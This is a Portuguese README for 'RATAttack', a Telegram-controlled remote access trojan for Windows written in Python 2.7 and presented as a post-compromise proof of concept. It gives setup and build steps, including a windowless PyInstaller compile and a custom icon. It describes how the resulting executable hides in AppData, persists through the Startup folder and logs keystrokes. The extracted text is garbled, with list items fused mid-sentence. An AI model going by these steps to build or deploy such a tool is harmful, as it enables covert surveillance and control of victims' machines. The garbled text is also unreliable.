
Ferramenta Remota de Pós-Comprometimento para Windows via Telegram
Ferramenta de Pós-Intrusão Remota no Windows via Telegram (Python 2.7), Originalmente criada por Ritiek, bifurcada e modificada por mvrozanti e depois por mim.
O propósito principal desta ferramenta é demonstrar (como um "PoC") o controle de uma máquina já comprometida, via Telegram. Assim como nas minhas ferramentas já escritas, não promovo atividades ilegais.
Esta versão modificada usa a API v2 do bot do Telegram, em vez da v1 tradicional. A principal mudança são botões de teclado em vez de digitação de texto. Tentarei adicionar novas funcionalidades, corrigir bugs e ser compatível com a API v3, após adicionar as alterações necessárias do "mvrozanti". Enquanto isso, comandos como cd, download, upload, run e delete não funcionarão.

file para o bot do TelegramAs atuais Ferramentas de Administração Remota no mercado enfrentam 2 grandes problemas:
Este RAT supera ambos os problemas usando a API do bot do Telegram.
BotFather.pip install -r requirements.txt.64-bit ou 32-bit dependendo do seu sistema.
pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl.pip install pyHook-1.5.1-cp27-cp27m-win32.whl.python RATAttack.py.chat_id no console e o substitua no script e comente a linha return True. Não se preocupe, você saberá quando ler os comentários no script.
RATAttack será criada no seu diretório de trabalho contendo e quaisquer arquivos que você enviar para o bot.Substitua seu caminho no compileAndRun.bat (ao executar, realmente executará o executável)
Execute `pyinstaller --onefile --noconsole C:\caminho\para\RATAttack.py`. Você também pode passar `--icon=<caminho\para\icon.ico>` para usar qualquer ícone personalizado.
.exe em C:\Python27\Scripts\dist\. Você pode alterar o nome do .exe como desejar..exe compilado, o script se ocultará e infectará seu PC para iniciar na inicialização. Você pode retornar ao normal usando a opção /self_destruct ou removendo manualmente o diretório C:\Users\Username\AppData\Roaming\Portal e C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\portal.lnk (embora eu recomende removê-los manualmente por enquanto)..exe oculto e a localização e nome da pasta onde o .exe oculto se esconderá. Para isso, modifique compiled_name e hide_folder respectivamente.The MIT License
keylogs.txt